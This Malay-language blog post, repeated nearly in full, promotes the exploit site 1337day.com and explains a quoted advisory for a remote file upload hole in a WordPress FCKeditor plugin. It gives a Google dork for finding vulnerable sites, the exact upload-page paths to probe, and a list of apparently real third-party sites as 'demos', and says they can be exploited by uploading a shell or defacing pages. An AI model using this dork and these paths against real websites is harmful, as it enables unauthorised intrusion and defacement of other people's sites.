1337day.com apa itu? ok 1337day.com ialah tempat terkumpulnya segal jenis vulnerability
website,software,OS dan macam-macam lagi tempat ni sangat berguna untuk para
penetration tester atau singkatnya sebagai " pentest " kita jugak boleh membuat kajian tentang tahap keselamatan website kita.
ok, disini aku bagi contoh. tentang exploit di bwah ni
Spoiler
Quote
#### # Exploit Title: WordPress deans with pwwangs code plugin for wordpress (FCKeditor) Remote File Upload
# Author: T0x!c
# Date : 28/03/2012
# Facebook Page: www.facebook.com/DzTem
# E-mail: Malik_99@hotmail.fr
# Category:: webapps
# Google Dork: inurl:"plugins/deans-fckeditor-with-pwwangs-code-plugin-for-wordpress/"
# Download: http://wordpress.org...-for-wordpress/
# Version: 1.0.0
# Tested on: [Windows Xp]
####
[ Vulnerable File ]
http://127.0.0.1/wp-...uploadtest.html
or
http://127.0.0.1/wp-...ctors/test.html
[ Shell ]
http://127.0.0.1/Use...es/YourFile.txt
# Demo :
http://cougardating....pload/test.html
http://www.cereuswom...uploadtest.html
https://scandlearn.c...ctors/test.html
http://blog.nextleve...tors/test.html#
=================================**AlgeriansHackers**==================================
# Greets To : KedAns-Dz * Caddy-Dz * Kha&miX * Jago-dz * Amine Msd * Kalashinkov *
(exploit-id.com) , (1337day.com) , (dis9.com) , (Dz-Team.biz)
=======================================================================================
exploit di atas ni megatakan yang wordpress plugin fckeditor mempunyai upload vurnerbility
dia juga memberi info tentang POC [ Proof of concept ] ok anthrax terangkan bagai mana nak memahami POC dia
di sini dia megatakan kita mesti mencari website t'sebut degan google dork. dork dia ialah ni.
Quote
inurl:"plugins/deans-fckeditor-with-pwwangs-code-plugin-for-wordpress/"
bila kita dah jumpa website t'sebut, kita akan test jika website tu Vlun atau pun tak degan cara letak cam ni
Quote
www.site.com/wp-content/plugins/deans-fckeditor-with-pwwangs-code-plugin-for-wordpress/fckeditor/editor/filemanager/connectors/uploadtest.html
atau pun
Quote
www.site.com/wp-content/plugins/deans-fckeditor-with-pwwangs-code-plugin-for-wordpress/filemanager/connectors/test.html
bila kita dah jumpa tempat untuk upload sesuatu, iyanya bermaksud website
tersebut adalah vlun. dan bekemunginan besar yang website tu boleh kita exploit degan mengupload shell, deface pages dan macam2 cara lagi.
di bawah ni adalah website-website yang vlun yang berdasarkan dari POC di atas.
Spoiler
ok sampai sini shaja nanti lain kali nak share lagi benda-benda yang hebat-hebat!
website,software,OS dan macam-macam lagi tempat ni sangat berguna untuk para
penetration tester atau singkatnya sebagai " pentest " kita jugak boleh membuat kajian tentang tahap keselamatan website kita.
ok, disini aku bagi contoh. tentang exploit di bwah ni
Spoiler
Quote
#### # Exploit Title: WordPress deans with pwwangs code plugin for wordpress (FCKeditor) Remote File Upload
# Author: T0x!c
# Date : 28/03/2012
# Facebook Page: www.facebook.com/DzTem
# E-mail: Malik_99@hotmail.fr
# Category:: webapps
# Google Dork: inurl:"plugins/deans-fckeditor-with-pwwangs-code-plugin-for-wordpress/"
# Download: http://wordpress.org...-for-wordpress/
# Version: 1.0.0
# Tested on: [Windows Xp]
####
[ Vulnerable File ]
http://127.0.0.1/wp-...uploadtest.html
or
http://127.0.0.1/wp-...ctors/test.html
[ Shell ]
http://127.0.0.1/Use...es/YourFile.txt
# Demo :
http://cougardating....pload/test.html
http://www.cereuswom...uploadtest.html
https://scandlearn.c...ctors/test.html
http://blog.nextleve...tors/test.html#
=================================**AlgeriansHackers**==================================
# Greets To : KedAns-Dz * Caddy-Dz * Kha&miX * Jago-dz * Amine Msd * Kalashinkov *
(exploit-id.com) , (1337day.com) , (dis9.com) , (Dz-Team.biz)
=======================================================================================
exploit di atas ni megatakan yang wordpress plugin fckeditor mempunyai upload vurnerbility
dia juga memberi info tentang POC [ Proof of concept ] ok anthrax terangkan bagai mana nak memahami POC dia
di sini dia megatakan kita mesti mencari website t'sebut degan google dork. dork dia ialah ni.
Quote
inurl:"plugins/deans-fckeditor-with-pwwangs-code-plugin-for-wordpress/"
bila kita dah jumpa website t'sebut, kita akan test jika website tu Vlun atau pun tak degan cara letak cam ni
Quote
www.site.com/wp-content/plugins/deans-fckeditor-with-pwwangs-code-plugin-for-wordpress/fckeditor/editor/filemanager/connectors/uploadtest.html
atau pun
Quote
www.site.com/wp-content/plugins/deans-fckeditor-with-pwwangs-code-plugin-for-wordpress/filemanager/connectors/test.html
bila kita dah jumpa tempat untuk upload sesuatu, iyanya bermaksud website
tersebut adalah vlun. dan bekemunginan besar yang website tu boleh kita exploit degan mengupload shell, deface pages dan macam2 cara lagi.
di bawah ni adalah website-website yang vlun yang berdasarkan dari POC di atas.
Spoiler
ok sampai sini shaja nanti lain kali nak share lagi benda-benda yang hebat-hebat!
No comments:
Post a Comment